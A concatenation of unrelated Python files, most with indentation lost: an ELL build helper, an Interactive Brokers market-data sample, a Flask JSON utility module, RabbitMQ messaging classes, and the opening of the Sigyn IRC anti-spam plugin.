args += ["--debug", "true"]
if profile:
args.append("--profile")
args += extra_options
self.logger.info("compiling model...")
self.run(args)
return out_file
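# --- Hypothetical usage sketch ------------------------------------------------
# Shows how the EllBuildTools helper above is typically driven: compile an ELL
# map to LLVM bitcode, optimize it, then lower it to an object file for a
# Raspberry Pi 3. Paths, function and model names are placeholders.
def example_build(ell_root, model_map, out_dir):
    tools = EllBuildTools(ell_root, verbose=True)
    bitcode = tools.compile(model_map, func_name="predict", model_name="model",
                            target="pi3", output_dir=out_dir, use_blas=True)
    optimized = tools.opt(out_dir, bitcode)       # compiled_model.bc -> .opt.bc
    return tools.llc(out_dir, optimized, "pi3")   # .opt.bc -> .o for the target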
|
ibalgo.py
|
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
import threading
import time
class IBapi(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
def tickPrice(self, reqId, tickType, price, attrib):
#if tickType == 2 and reqId == 1:
print('The current ask price is: ', price)
def run_loop():
app.run()
app = IBapi()
app.connect('127.0.0.1', 7497, 123)
#Start the socket in a thread
api_thread = threading.Thread(target=run_loop, daemon=True)
api_thread.start()
time.sleep(1) #Sleep interval to allow time for connection to server
#Create contract object
apple_contract = Contract()
apple_contract.symbol = 'AAPL'
apple_contract.secType = 'STK'
apple_contract.exchange = 'SMART'
apple_contract.currency = 'USD'
app.reqMarketDataType(3)
#Request Market Data
app.reqMktData(1, apple_contract, '', False, False, [])
time.sleep(10) #Sleep interval to allow time for incoming price data
app.disconnect()
|
payload.py
|
# -*- coding: utf-8 -*-
"""
peregrine.resources.submission.util
----------------------------------
Provides utility functions for the submission resource.
"""
from collections import Counter
import json
import os
import simplejson
import flask
from flask import current_app as capp
from flask import request
from functools import wraps
from threading import Thread
from peregrine.errors import UserError
from peregrine.resources.submission.constants import (
project_seed,
program_seed,
ERROR_STATE,
FLAG_IS_ASYNC,
submitted_state,
UPLOADING_STATE,
SUCCESS_STATE,
)
def get_external_proxies():
"""Get any custom proxies set in the config.
This is a rather specific use case, but here we want to reach out
to an external resource via a proxy but do not want to set the
proxy environment variable proper.
This value should be added to ``app.config['EXTERNAL_PROXIES']``.
And should look something like
.. code-block::
{
'http': "http://<http_proxy:port>",
'https': "https://<https_proxy:port>",
}
:returns:
A Dictionary ``{'http': ..., 'https': ...}`` with proxies. If
a certain proxy is not specified, it should be absent from the
dictionary.
"""
return capp.config.get('EXTERNAL_PROXIES', {})
def oph_raise_for_duplicates(object_pairs):
"""Given an list of ordered pairs, contstruct a dict as with the
normal JSON ``object_pairs_hook``, but raise an exception if there
are duplicate keys with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = filter(lambda p: p[1] > 1, counter.iteritems())
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates)))
return {
pair[0]: pair[1]
for pair in object_pairs
}
def parse_json(raw):
"""Returns a python representation of a JSON document.
:param str raw: Load this provided string.
:raises: UserError if any exception is raised parsing the JSON body
.. note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
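# Illustrative only: a tiny example of the duplicate-key guard above. Loading a
# JSON document with a repeated key raises UserError instead of silently keeping
# the last value (which is what a plain json.loads would do).
def _example_duplicate_key_rejection():
    try:
        parse_json('{"name": "a", "name": "b"}')
    except UserError as err:
        # err reads roughly:
        # 'Unable to parse json: The document contains duplicate keys: name'
        return str(err)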
def parse_request_json(expected_types=(dict, list)):
"""Returns a python representation of a JSON POST body.
:param str raw:
Load this provided string. If raw is not provided, pull the body
from global request object
:raises: UserError if any exception is raised parsing the JSON body
:raises: UserError if the result is not of the expected type
"""
parsed = parse_json(request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
# def parse_request_yaml():
# """Returns a python representation of a YAML POST body.
# :raises: UserError if any exception is raised parsing the YAML body
# """
# raw = request.get_data()
# try:
# return yaml.safe_load(raw)
# except Exception as e:
# raise UserError('Unable to parse yaml: {}'.format(e))
# def lookup_node(psql_driver, label, node_id=None, secondary_keys=None):
# """Return a query for nodes by id and secondary keys"""
# cls = Node.get_subclass(label)
# query = psql_driver.nodes(cls)
# if node_id is None and not secondary_keys:
# return query.filter(sqlalchemy.sql.false())
# if node_id is not None:
# query = query.ids(node_id)
# if all(all(keys) for keys in secondary_keys):
# query = query.filter(cls._secondary_keys == secondary_keys)
# return query
# def lookup_project(psql_driver, program, project):
# """Return a project by Project.code if attached to Program.name"""
# return (psql_driver.nodes(models.Project).props(code=project)
# .path('programs')
# .props(name=program)
# .scalar())
# def lookup_program(psql_driver, program):
# """Return a program by Program.name"""
# return psql_driver.nodes(models.Program).props(name=program).scalar()
# def get_entities(psql_driver, node_ids):
# """Lookup entities from graph by node_id"""
# query = psql_driver.nodes().ids(node_ids)
# nodes = query.all()
# entities = {n.node_id: n for n in nodes}
# return entities
def parse_boolean(value):
"""Try parse boolean. raises UserError if unable. """
if isinstance(value, bool):
return value
elif value.lower() == 'true':
return True
elif value.lower() == 'false':
return False
else:
raise UserError('Boolean value not one of [true, false]')
def is_flag_set(flag, default=False):
"""Did the user specify the value of a flag (default: False)
Example:
?async=true
Requires request context.
"""
return parse_boolean(request.args.get(flag, default))
def async(f):
"""Decorator to run function in background"""
@wraps(f)
def wrapper(*args, **kwargs):
"""Wrapper for async call"""
thread = Thread(target=f, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
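# Illustrative only: hypothetical use of the @async decorator above. The
# decorated function runs in a background thread and the caller immediately
# gets the Thread object back, so the request thread is never blocked.
def _example_async_usage(url, payload):
    @async
    def _send(u, p):
        # slow I/O would happen here without blocking the caller
        pass
    thread = _send(url, payload)
    return thread  # callers may thread.join() only if they really need to wait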
def get_introspection_query():
cur_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(cur_dir, 'graphql', 'introspection_query.txt'), 'r') as f:
return f.read()
def json_dumps_formatted(data):
"""Return json string with standard format."""
dump = json.dumps(
data, indent=2, separators=(', ', ': '), ensure_ascii=False
)
return dump.encode('utf-8')
def jsonify_check_errors(data_and_errors, error_code=400):
"""
TODO
"""
data, errors = data_and_errors
if errors:
return flask.jsonify({'data': data, 'errors': errors}), error_code
else:
return flask.jsonify({'data': data}), 200
def get_variables(payload):
var_payload = payload.get('variables')
variables = None
errors = None
if isinstance(var_payload, dict):
variables = var_payload
else:
try:
variables = json.loads(var_payload) if var_payload else {}
except Exception as e:
errors = ['Unable to parse variables', str(e)]
return variables, errors
|
rabbit.py
|
"""
Classes for working with RabbitMQ message queues. Support for three types of
queues is provided.
1. ``MessageQueue`` -- a message queue for implementing the producer/consumer
pattern.
#. ``Broadcaster`` -- used to send messages to all registered listeners.
#. ``MessageBus`` -- used to send messages to a specific listener.
The above classes also have listener classes that users can use to receive
messages.
"""
import pika
import threading
import logging
import config as cfg
from deiis.model import Serializer, JsonObject, Type
PERSIST = pika.BasicProperties(delivery_mode=2)
# Python 3 does not have a basestring type. So on Python 3 we assign the 'str'
# type to 'basestring' so we can test if a variable is a string in Python 2 and 3.
try:
basestring
except:
basestring = str
class Message(JsonObject):
"""
The data model for message that are passed between services.
type -- one of 'route' or 'command'.
body -- the string (message) to be sent.
route -- the list of services the message should be sent to.
Messages of type 'route' should be processed and passed to the next service
in the ``route`` list. Messages of type 'command' and used to send commands
to services, e.g. shutdown.
"""
properties = {
'type': (lambda: 'route'),
'body': Type.text,
'route': list
}
def __init__(self, params=None, **kwargs):
super(Message, self).__init__(params)
for name, value in kwargs.items():
if name in Message.properties:
setattr(self, name, value)
def forward(self):
if len(self.route) == 0:
return None
target = self.route[0]
self.route = self.route[1:]
return target
@staticmethod
def Command(body, route=[]):
return Message(type='command', body=body, route=route)
class MessageBus(object):
"""
Creates a 'direct' exchange named 'message_bus'.
Use a MessageBus instance to send messages to specific listeners on the exchange.
bus = MessageBus()
bus.publish('target', 'Hello world.')
"""
def __init__(self, exchange='message_bus', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='direct')
self.exchange = exchange
def publish(self, route, message):
if not isinstance(message, basestring):
message = Serializer.to_json(message)
try:
self.channel.basic_publish(exchange=self.exchange, routing_key=route, body=message, properties=PERSIST)
except Exception as e:
logger = logging.getLogger(self.__class__.__name__)
logger.error("Unable to publish the message: %s", e.message)
logger.exception(e.message)
class BusListener(object):
"""
A listener for a specific route on the message_bus exchange.
listener = BusListener('my.address')
listener.start()
# In a different thread.
bus = MessageBus()
# Send a message to the above listener:
bus.publish('my.address', 'Hello world.')
"""
def __init__(self, route, exchange='message_bus', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='direct')
self.exchange = exchange
self.route = route
result = self.channel.queue_declare(exclusive=True)
self.name = result.method.queue
self.channel.queue_bind(exchange=self.exchange, queue=self.name, routing_key=self.route)
self.logger = logging.getLogger(self.__class__.__name__)
def start(self):
"""Starts listening on the queue. No messages will be delivered to this
listener until the `start` method is called.
This method blocks until another thread calls the `stop` method.
"""
self.channel.start_consuming()
def stop(self):
"""Stops the listener and causes the `start()` method to exit."""
self.logger.debug('Sending basic_cancel')
self.channel.basic_cancel(self.tag)
self.logger.debug('basic_cancel sent')
def register(self, handler):
self.tag = self.channel.basic_consume(handler, queue=self.name)
class Broadcaster(object):
"""
Broadcasts messages to all registered listeners.
Creates a 'fanout' exchange named 'broadcast'.
"""
def __init__(self, exchange='broadcast', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='fanout')
self.exchange = exchange
def broadcast(self, message):
self.channel.basic_publish(self.exchange, routing_key='*', body=message)
def stop(self):
self.connection.close()
class BroadcastListener(object):
"""
A listener for the 'broadcast' exchange.
"""
def __init__(self, exchange='broadcast', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='fanout')
result = self.channel.queue_declare(exclusive=True)
self.name = result.method.queue
self.channel.queue_bind(exchange=exchange, queue=self.name)
self.tag = False
self.logger = logging.getLogger(self.__class__.__name__)
def register(self, handler):
"""
Register a handler for the exchange.
Note that we do not ack (acknowledge) broadcast messages so there is
no guarantee that the message will be delivered/received.
"""
self.tag = self.channel.basic_consume(handler, queue=self.name, no_ack=True)
def start(self):
"""
Starts the listener.
This method will block until another thread calls the `stop` method.
"""
self.channel.start_consuming()
def stop(self):
"""
Stops the thread and causes the `start` method to terminate.
"""
self.logger.debug('Sending basic_cancel')
self.channel.basic_cancel(self.tag)
self.logger.debug('basic_cancel sent')
class MessageQueue(object):
"""
The MessageQueue class is used for Producer/Consumer scenarios.
Messages will be dealt out to listeners in a round-robin fashion.
"""
def __init__(self, name, host=cfg.host, exchange='', durable=False, fair=False):
self.exchange = exchange
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.queue_declare(name, durable=durable)
self.tag = False
# Set fair=True if multiple consumers are reading from a single queue.
if fair:
self.channel.basic_qos(prefetch_count=1)
self.queue = name
def publish(self, message):
"""Published the message to the queue managed by this instance."""
self.channel.basic_publish(self.exchange, routing_key=self.queue, body=message, properties=PERSIST)
def register(self, handler):
"""Registers the handler as a consumer for the queue managed by this instance."""
self.tag = self.channel.basic_consume(handler, self.queue)
def start(self):
"""Start waiting for messages to arrive on our queue."""
self.channel.start_consuming()
def stop(self):
"""Stop the listener and close the connection."""
self.channel.basic_cancel(self.tag)
self.connection.close()
def ack(self, method):
"""Acknowledge the message."""
self.channel.basic_ack(delivery_tag=method.delivery_tag)
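# --- Illustrative sketch (not used by the library) ----------------------------
# Minimal producer/consumer round-trip with the MessageQueue class above. The
# queue name and the handler body are placeholders.
def _example_message_queue_roundtrip():
    queue = MessageQueue('example.tasks', durable=True, fair=True)
    def handler(channel, method, properties, body):
        print('received: %s' % body)
        queue.ack(method)          # acknowledge so RabbitMQ drops the message
    queue.register(handler)
    queue.publish('hello world')
    # queue.start() would now block this thread until another thread calls
    # queue.stop(); it is left commented out so the sketch has no side effects.
    # queue.start()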
class Consumer(object):
"""
A Consumer receives messages from an input queue and "consumes" them.
What is meant by "consume" depends on what subclasses do in their `work`
methods. However, Consumers do not produce "output" in the sense
that they do not write to an output queue.
"""
def __init__(self, name, input):
self.name = name
self.input_queue = MessageQueue(input)
self.input_queue.register(handler=self._handler)
self.listener = BroadcastListener()
self.listener.register(handler=self._broadcast_handler)
self.thread = False
def _handler(self, channel, method, properties, body):
"""RabbitMQ will call the _handler method when a message arrives on the queue."""
if body == 'HALT':
self.stop()
# Allow Workers to propagate the HALT message to their output_queue.
self.halt()
elif body == 'KILL':
# Stops the input queue but does not propagate the messages any further.
self.stop()
else:
self.work(body)
# Acknowledge that the message was processed.
channel.basic_ack(delivery_tag=method.delivery_tag)
def _broadcast_handler(self, channel, method, properties, message):
self.broadcast(message)
def broadcast(self, message):
pass
def work(self, message):
"""Subclasses will override the work method to perform their work"""
pass
def halt(self):
"""Overloaded by the Worker class to propagate HALT messages."""
print("Halting consumer " + self.name)
def stop(self):
self.input_queue.stop()
self.listener.stop()
def start(self):
"""Start listening on our input_queue.
MessageQueues are blocking so the start() method will block until another
process cancels the queue by sending a HALT message
"""
print(self.name + " starting")
# The message queues are blocking, so we need to start the broadcast
# listener in its own thread.
def start_listener():
try:
self.listener.start()
except Exception:
pass
# launch the broadcast listener in its own thread; without this, self.thread
# would stay False and the join() below would fail
self.thread = threading.Thread(target=start_listener)
self.thread.start()
self.input_queue.start()
# Once the input_queue has stopped we need to wait for the listener
# thread to terminate as well.
self.thread.join()
print(self.name + " halted.")
class Worker(Consumer):
'''
A `Worker` is a type of `Consumer` that writes its output to an
output message queue.
'''
def __init__(self, name, input, output):
super(Worker, self).__init__(name, input)
self.output_queue = MessageQueue(output)
def write(self, message):
self.output_queue.publish(message)
def halt(self):
self.output_queue.publish('HALT')
print("Halting worker " + self.name)
class Task(object):
"""
The Task classes serves as the base class for services in BioASQ pipelines.
The Task class does all the administrative busy-work needed to manage the
RabbitMQ queues so services only need to implement the `perform` method.
"""
def __init__(self, route):
"""Route is a String containing the unique address for the service."""
self.bus = MessageBus()
self.listener = BusListener(route)
self.listener.register(self._handler)
self.thread = False
self.route = route
self.logger = logging.getLogger(self.__class__.__name__)
def start(self):
"""
Starts the service in a separate Thread.
The thread is started as a daemon so calls to this method don't
block.
"""
def run():
try:
self.logger.debug('Starting the listener')
self.listener.start()
self.logger.debug('listener.start() has exited')
except Exception as e:
self.logger.exception(e)
t = threading.Thread(target=run)
t.daemon = True
t.start()
self.thread = t
def _handler(self, channel, method, properties, message):
"""Default message handler that calls the user's `perform` method
and then acknowledges the message.
"""
self.perform(message)
self.ack(method)
def ack(self, method):
"""Shorthand for what is otherwise a really lengthy method call."""
self.listener.channel.basic_ack(delivery_tag=method.delivery_tag)
def stop(self):
"""Stops the listener which will cause the `run` method above to
exit and our thread to terminate.
"""
self.logger.debug('Stopping the listener.')
self.listener.stop()
self.logger.debug('Stopped listeners.')
def wait_for(self):
"""Waits for this task's thread to terminate."""
self.thread.join()
self.logger.debug('Thread %s terminated.', self.__class__.__name__)
def perform(self, input):
"""Services should override this method to handle incoming messages."""
pass
def deliver(self, message):
"""Sends the message to the next target, if any."""
target = message.forward()
if target is not None:
self.logger.debug('Delivering message to %s', target)
self.bus.publish(target, Serializer.to_json(message))
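# --- Illustrative sketch (not used by the library) ----------------------------
# A minimal service built on the Task base class above: it wraps the incoming
# payload in a new 'route' Message and forwards it to the next hop. The route
# names are placeholders, and turning the raw JSON back into a Message depends
# on deiis.model.Serializer's API, so deserialization is deliberately left out.
class EchoTask(Task):
    def __init__(self, next_route):
        super(EchoTask, self).__init__('example.echo')
        self.next_route = next_route
    def perform(self, input):
        reply = Message(type='route', body=input, route=[self.next_route])
        self.deliver(reply)

# Hypothetical usage:
#   task = EchoTask('example.sink')
#   task.start()      # listener runs in a daemon thread
#   ...
#   task.stop(); task.wait_for()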
|
plugin.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###
# Copyright (c) 2016, Nicolas Coevoet
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
# coding: utf-8
import os
import re
import sys
import time
import requests
from urllib.parse import urlencode
import sqlite3
import http.client
import threading
import dns.resolver
import json
import ipaddress
import random
import supybot.log as log
import supybot.conf as conf
import supybot.utils as utils
import supybot.ircdb as ircdb
import supybot.world as world
from supybot.commands import *
import supybot.ircmsgs as ircmsgs
import supybot.plugins as plugins
import supybot.commands as commands
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
import supybot.schedule as schedule
import supybot.registry as registry
from ftfy.badness import sequence_weirdness
from ftfy.badness import text_cost
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('Sigyn')
except:
_ = lambda x:x
def repetitions(s):
# returns a list of (pattern,count), used to detect a repeated pattern inside a single string.
r = re.compile(r"(.+?)\1+")
for match in r.finditer(s):
yield (match.group(1), len(match.group(0))/len(match.group(1)))
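# Illustrative only: repetitions('abcabcabc') yields ('abc', 3.0), which is how
# the plugin spots a message made of a single repeated chunk.
def _example_repetitions():
    return list(repetitions('abcabcabc'))  # -> [('abc', 3.0)]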
def isCloaked (prefix,sig):
if sig.registryValue('useWhoWas'):
return False
if not ircutils.isUserHostmask(prefix):
return False
(nick,ident,host) = ircutils.splitHostmask(prefix)
if '/' in host:
if host.startswith('gateway/') or host.startswith('nat/'):
return False
return True
return False
def compareString (a,b):
"""return 0 to 1 float percent of similarity ( 0.85 seems to be a good average )"""
if a == b:
return 1
sa, sb = set(a), set(b)
n = len(sa.intersection(sb))
if float(len(sa) + len(sb) - n) == 0:
return 0
jacc = n / float(len(sa) + len(sb) - n)
return jacc
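# Illustrative only: compareString() is a Jaccard similarity over the sets of
# characters of both strings, so near-identical spam lines score high while
# unrelated strings score near 0.
def _example_compareString():
    return (compareString('free bitcoin here', 'free bitcoin now'),  # high, ~0.8
            compareString('hello', 'zzzzz'))                         # 0.0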
def largestString (s1,s2):
"""return largest pattern available in 2 strings"""
# From https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Longest_common_substring#Python2
# License: CC BY-SA
m = [[0] * (1 + len(s2)) for i in range(1 + len(s1))]
longest, x_longest = 0, 0
for x in range(1, 1 + len(s1)):
for y in range(1, 1 + len(s2)):
if s1[x - 1] == s2[y - 1]:
m[x][y] = m[x - 1][y - 1] + 1
if m[x][y] > longest:
longest = m[x][y]
x_longest = x
else:
m[x][y] = 0
return s1[x_longest - longest: x_longest]
def floatToGMT (t):
f = None
try:
f = float(t)
except:
return None
return time.strftime('%Y-%m-%d %H:%M:%S GMT',time.gmtime(f))
def _getRe(f):
def get(irc, msg, args, state):
original = args[:]
s = args.pop(0)
def isRe(s):
try:
foo = f(s)
return True
except ValueError:
return False
try:
while len(s) < 512 and not isRe(s):
s += ' ' + args.pop(0)
if len(s) < 512:
state.args.append([s,f(s)])
else:
state.errorInvalid('regular expression', s)
except IndexError:
args[:] = original
state.errorInvalid('regular expression', s)
return get
getPatternAndMatcher = _getRe(utils.str.perlReToPythonRe)
addConverter('getPatternAndMatcher', getPatternAndMatcher)
class Ircd (object):
__slots__ = ('irc', 'channels','whowas','klines','queues','opered','defcon','pending','logs','limits','netsplit','ping','servers','resolving','stats','patterns','throttled','lastDefcon','god','mx','tokline','toklineresults','dlines', 'invites', 'nicks', 'domains', 'cleandomains', 'ilines', 'klinednicks', 'lastKlineOper')
def __init__(self,irc):
self.irc = irc
# contains Chan instances
self.channels = {}
# contains Pattern instances
self.patterns = {}
# contains whowas requested for a short period of time
self.whowas = {}
# contains klines requested for a short period of time
self.klines = {}
# contains various TimeoutQueue for detection purpose
# often it's [host] { with various TimeOutQueue and others elements }
self.queues = {}
# flag or time
self.opered = False
# flag or time
self.defcon = False
# used for temporary storage of outgoing actions
self.pending = {}
self.logs = {}
# contains servers notices when full or in bad state
# [servername] = time.time()
self.limits = {}
# flag or time
self.netsplit = time.time() + 300
self.ping = None
self.servers = {}
self.resolving = {}
self.stats = {}
self.ilines = {}
self.throttled = False
self.lastDefcon = False
self.god = False
self.mx = {}
self.tokline = {}
self.toklineresults = {}
self.dlines = []
self.invites = {}
self.nicks = {}
self.cleandomains = {}
self.klinednicks = utils.structures.TimeoutQueue(86400*2)
self.lastKlineOper = ''
def __repr__(self):
return '%s(patterns=%r, queues=%r, channels=%r, pending=%r, logs=%r, limits=%r, whowas=%r, klines=%r)' % (self.__class__.__name__,
self.patterns, self.queues, self.channels, self.pending, self.logs, self.limits, self.whowas, self.klines)
def restore (self,db):
c = db.cursor()
c.execute("""SELECT id, pattern, regexp, mini, life FROM patterns WHERE removed_at is NULL""")
items = c.fetchall()
if len(items):
for item in items:
(uid,pattern,regexp,limit,life) = item
regexp = int(regexp)
if regexp == 1:
regexp = True
else:
regexp = False
self.patterns[uid] = Pattern(uid,pattern,regexp,limit,life)
c.close()
def add (self,db,prefix,pattern,limit,life,regexp):
c = db.cursor()
t = 0
if regexp:
t = 1
c.execute("""INSERT INTO patterns VALUES (NULL, ?, ?, ?, ?, ?, ?, ?, ?, NULL, NULL)""", (pattern,t,limit,life,prefix,'',0,float(time.time())))
uid = int(c.lastrowid)
self.patterns[uid] = Pattern(uid,pattern,regexp,limit,life)
db.commit()
c.close()
return uid
def count(self,db,uid):
uid = int(uid)
if uid in self.patterns:
c = db.cursor()
c.execute("""SELECT id, triggered FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
if len(items):
(uid,triggered) = items[0]
triggered = int(triggered + 1)
c.execute("""UPDATE patterns SET triggered=? WHERE id=?""",(triggered,uid))
db.commit()
c.close()
def ls (self,db,pattern,deep=False):
c = db.cursor()
glob = '*%s*' % pattern
like = '%'+pattern+'%'
i = None
try:
i = int(pattern)
except:
i = None
if i:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE id=? LIMIT 1""",(i,))
else:
if deep:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE id GLOB ? OR id LIKE ? OR pattern GLOB ? OR pattern LIKE ? OR comment GLOB ? OR comment LIKE ? ORDER BY id DESC""",(glob,like,glob,like,glob,like))
else:
c.execute("""SELECT id, pattern, regexp, operator, at, triggered, removed_at, removed_by, comment, mini, life FROM patterns WHERE (id GLOB ? OR id LIKE ? OR pattern GLOB ? OR pattern LIKE ? OR comment GLOB ? OR comment LIKE ?) and removed_at is NULL ORDER BY id DESC""",(glob,like,glob,like,glob,like))
items = c.fetchall()
c.close()
if len(items):
results = []
for item in items:
(uid,pattern,regexp,operator,at,triggered,removed_at,removed_by,comment,limit,life) = item
end = ''
if i:
if removed_by:
end = ' - disabled on %s by %s - ' % (floatToGMT(removed_at),removed_by.split('!')[0])
regexp = int(regexp)
reg = 'not case sensitive'
if regexp == 1:
reg = 'regexp pattern'
results.append('#%s "%s" by %s on %s (%s calls) %s/%ss%s %s - %s' % (uid,pattern,operator.split('!')[0],floatToGMT(at),triggered,limit,life,end,comment,reg))
else:
if removed_by:
end = ' (disabled)'
results.append('[#%s "%s" (%s calls) %s/%ss%s]' % (uid,pattern,triggered,limit,life,end))
return results
return []
def edit (self,db,uid,limit,life,comment):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, life FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
if len(items):
if comment:
c.execute("""UPDATE patterns SET life=?, mini=?, comment=? WHERE id=? LIMIT 1""",(life,limit,comment,uid))
else:
c.execute("""UPDATE patterns SET life=?, mini=? WHERE id=? LIMIT 1""",(life,limit,uid))
db.commit()
if uid in self.patterns:
self.patterns[uid].life = life
self.patterns[uid].limit = limit
found = True
c.close()
return (len(items))
def toggle (self,db,uid,prefix,active):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, pattern, regexp, mini, life, removed_at, removed_by FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
updated = False
if len(items):
(id,pattern,regexp,limit,life,removed_at,removed_by) = items[0]
regexp = int(regexp)
if active and removed_at:
c.execute("""UPDATE patterns SET removed_at=NULL, removed_by=NULL WHERE id=? LIMIT 1""",(uid,))
self.patterns[uid] = Pattern(uid,pattern,regexp == 1,limit,life)
updated = True
elif not removed_at and not active:
c.execute("""UPDATE patterns SET removed_at=?, removed_by=? WHERE id=? LIMIT 1""",(float(time.time()),prefix,uid))
if uid in self.patterns:
del self.patterns[uid]
updated = True
db.commit()
c.close()
return updated
def remove (self, db, uid):
c = db.cursor()
uid = int(uid)
c.execute("""SELECT id, pattern, regexp, mini, life, removed_at, removed_by FROM patterns WHERE id=? LIMIT 1""",(uid,))
items = c.fetchall()
updated = False
if len(items):
(id,pattern,regexp,limit,life,removed_at,removed_by) = items[0]
c.execute("""DELETE FROM patterns WHERE id=? LIMIT 1""",(uid,))
if not removed_at:
if uid in self.patterns:
del self.patterns[uid]
updated = True
db.commit()
c.close()
return updated
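# Chan holds per-channel state: computed temporary patterns, per-user message
# buffers used by the various protections, log queues, known nicks and the
# klines recently issued from that channel.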
class Chan (object):
__slots__ = ('channel', 'patterns', 'buffers', 'logs', 'nicks', 'called', 'klines', 'requestedBySpam')
def __init__(self,channel):
self.channel = channel
self.patterns = None
self.buffers = {}
self.logs = {}
self.nicks = {}
self.called = False
self.klines = utils.structures.TimeoutQueue(1800)
self.requestedBySpam = False
def __repr__(self):
return '%s(channel=%r, patterns=%r, buffers=%r, logs=%r, nicks=%r)' % (self.__class__.__name__,
self.channel, self.patterns, self.buffers, self.logs, self.nicks)
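# Pattern represents a permanent pattern: either a case-insensitive substring
# or a compiled Perl-style regexp, together with the call limit and lifetime
# used to decide when matches turn into klines.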
class Pattern (object):
__slots__ = ('uid', 'pattern', 'limit', 'life', '_match')
def __init__(self,uid,pattern,regexp,limit,life):
self.uid = uid
self.pattern = pattern
self.limit = limit
self.life = life
self._match = False
if regexp:
self._match = utils.str.perlReToPythonRe(pattern)
else:
self.pattern = pattern.lower()
def match (self,text):
s = False
if isinstance(text,bytes):
text = str(text, "utf-8")
if self._match:
s = self._match.search (text) != None
else:
text = text.lower()
s = self.pattern in text
return s
def __repr__(self):
return '%s(uid=%r, pattern=%r, limit=%r, life=%r, _match=%r)' % (self.__class__.__name__,
self.uid, self.pattern, self.limit, self.life, self._match)
class Sigyn(callbacks.Plugin,plugins.ChannelDBHandler):
"""Network and Channels Spam protections"""
threaded = True
noIgnore = True
def __init__(self, irc):
callbacks.Plugin.__init__(self, irc)
plugins.ChannelDBHandler.__init__(self)
self._ircs = ircutils.IrcDict()
self.cache = {}
self.getIrc(irc)
self.starting = world.starting
self.recaps = re.compile("[A-Z]")
self.ipfiltered = {}
self.rmrequestors = {}
